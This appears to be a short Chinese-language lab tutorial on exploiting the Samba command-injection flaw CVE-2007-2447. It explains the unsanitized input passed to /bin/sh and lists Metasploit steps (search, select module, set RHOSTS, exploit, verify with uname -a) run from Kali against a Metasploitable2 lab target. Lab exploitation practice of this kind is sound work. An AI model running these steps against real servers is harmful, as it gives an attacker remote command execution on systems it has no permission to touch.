Samba远程Shell命令注入执行漏洞

CVE:CVE-2007-2447

原理:

Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

 

漏洞利用:

攻击机 kali
IP 192.168.129.133

靶机 Metasploitable2
IP 192.168.129.128

 

msf中搜索samba

Samba远程Shell命令注入执行漏洞

use 13 选择漏洞

Samba远程Shell命令注入执行漏洞

show options 查看选项

Samba远程Shell命令注入执行漏洞

set RHOSTS 设置要攻击的ip

Samba远程Shell命令注入执行漏洞

exploit 开始攻击

Samba远程Shell命令注入执行漏洞

之后uname -a验证

 

相关文章:

  • 2021-04-24
  • 2022-01-06
  • 2021-11-10
  • 2021-09-11
  • 2021-10-19
  • 2021-11-06
  • 2022-03-02
  • 2021-08-25
猜你喜欢
  • 2021-07-23
  • 2021-07-11
  • 2021-09-01
  • 2021-12-29
  • 2021-11-07
  • 2021-12-21
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode